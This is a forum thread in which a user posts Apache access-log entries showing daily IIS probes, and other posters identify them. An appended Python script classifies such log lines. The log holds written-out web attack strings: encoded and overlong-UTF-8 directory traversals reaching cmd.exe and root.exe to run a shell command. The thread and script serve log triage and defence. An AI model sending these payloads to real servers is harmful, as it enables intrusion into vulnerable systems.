Apache on Windows 2k3 Log Questions
amERICa
Ever since I set up Apache2 on my Windows2003 server, I have been seeing these requests once a day. Never at the same time, but approximately 24 hours apart and from different IP addresses. The requests are exactly the same each time: same order, same things they are looking for. Could these possibly be malicious in nature, or could someone shed some light on the subject? I am relatively new to Apache but learning gradually. They always result in 404 or 400 errors, so I think it's safe to say I am safe from this attack if it is one, but I am still curious.


24.19.242.117 - - [31/Mar/2005:03:19:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292
24.19.242.117 - - [31/Mar/2005:03:19:40 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290
24.19.242.117 - - [31/Mar/2005:03:19:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
24.19.242.117 - - [31/Mar/2005:03:19:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
24.19.242.117 - - [31/Mar/2005:03:19:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
24.19.242.117 - - [31/Mar/2005:03:19:41 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 347
24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
struct
they look pretty malicious to me, like buffer overflow attempts. but then again I know 0 about Apache.
Menge
yep

those are attempts at badly shielded IIS servers
with apache, you don't really need to worry about those all that much. you can always block those IPs that attack you too
garethevans1986
I've had somebody messing with my IIS servers before now.....my logs were like that too...

ChocIST
amERICa
Thanks everyone. They all appear to come from a 24 address, so I just blocked the entire thing. I only have this up to access some things from work, so I don't really care for anyone else accessing it =)
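An added example, not part of the original thread: a small Python triage script that classifies access-log lines like the ones posted above by peeling off each layer of percent-encoding and reporting the status code the server returned. The flag names, the function names and the benign sample line are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: four request lines copied from the log in this thread,
# plus one made-up benign line.
SAMPLE = [
    '24.19.242.117 - - [31/Mar/2005:03:19:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292',
    '24.19.242.117 - - [31/Mar/2005:03:19:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314',
    '24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313',
    '24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304',
    '192.0.2.10 - - [31/Mar/2005:09:00:00 -0500] "GET /index.html HTTP/1.1" 200 1024',
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+$')
OVERLONG_RE = re.compile(rb'[\xc0\xc1](.)', re.S)

def decode_layers(path, max_rounds=4):
    """Percent-decode until the value stops changing; return (bytes, rounds)."""
    data, rounds = path.encode('latin-1'), 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def fold_overlong(data):
    """0xC0/0xC1 never start valid UTF-8; map each such pair to the ASCII byte
    a lenient decoder would yield, so '..%c0%af..' normalises to '../..'."""
    return OVERLONG_RE.sub(
        lambda m: bytes([(m.group(0)[0] & 0x1F) << 6 | (m.group(1)[0] & 0x3F)]), data)

def classify(line):
    """Return (client, status, sorted flags) for one log line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    raw, rounds = decode_layers(target.split('?', 1)[0])
    norm = fold_overlong(raw).replace(b'\\', b'/').lower()
    checks = {
        'multi-encoded': rounds >= 2,
        'overlong-utf8': b'\xc0' in raw or b'\xc1' in raw,
        'traversal': b'..' in norm.split(b'/'),
        'shell-probe': norm.endswith((b'/cmd.exe', b'/root.exe')),
    }
    return client, int(status), sorted(f for f, hit in checks.items() if hit)

if __name__ == '__main__':
    for entry in SAMPLE:
        print(classify(entry))
```

A flagged request that comes back with a 2xx status is the case worth following up; flagged requests answered with 404 or 400, as in the log above, were not served.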